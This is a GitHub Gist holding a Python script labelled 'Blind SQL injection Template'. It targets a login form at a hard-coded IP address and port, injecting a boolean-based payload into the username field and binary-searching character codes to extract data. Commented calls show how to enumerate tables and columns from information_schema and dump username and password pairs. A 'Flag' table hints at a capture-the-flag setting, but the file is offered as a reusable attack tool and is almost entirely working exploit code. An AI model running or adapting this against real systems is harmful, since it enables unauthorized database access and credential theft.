Last active
December 8, 2020 00:39
-
-
Save abdilahrf/7bec7075b9c4dc8b0cd7449324768b51 to your computer and use it in GitHub Desktop.
Blind SQL injection Template
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import re | |
url = "http://88.198.233.174:33534/index.php" | |
payload = { | |
"username":"", | |
"password":"x", | |
} | |
def check(data): | |
return re.search("Construction!", data) | |
def blind(kolom,table): | |
passwd = "" | |
idx = 1 | |
while (True): | |
lo = 1 | |
hi = 255 | |
temp = -1 | |
while(lo <= hi): | |
mid = (lo + hi) / 2 | |
payload['username'] = "' OR 1=1 and (select ascii(substring({},{},1)) from {}) <= {}#".format(str(kolom),str(idx),str(table),str(mid)) | |
# print payload | |
res = requests.post(url,data=payload) | |
if check(res.text): | |
hi = mid-1 | |
temp = mid | |
else: | |
lo = mid+1 | |
if (hi == 0): break | |
passwd += chr(temp) | |
print "Result [{}]: {}".format(table,passwd) | |
idx += 1 | |
return passwd | |
# get table name | |
# blind("group_concat(table_name)", "information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d61") | |
# blind("group_concat(table_name)", "information_schema.tables order by table_schema desc") | |
# Result: users | |
# | |
# get column name | |
# username,password | |
# blind("group_concat(column_name)", "information_schema.columns where table_name='users'") | |
# blind("group_concat(column_name)", "information_schema.columns where table_name='Login'") | |
# blind("group_concat(column_name)", "information_schema.columns where table_name='Flag'") | |
# get data | |
# blind("group_concat(username,0x3a,password)", "users") | |
# blind("group_concat(username,password)", "Login") | |
# blind("group_concat(username,password)", "Flag") | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment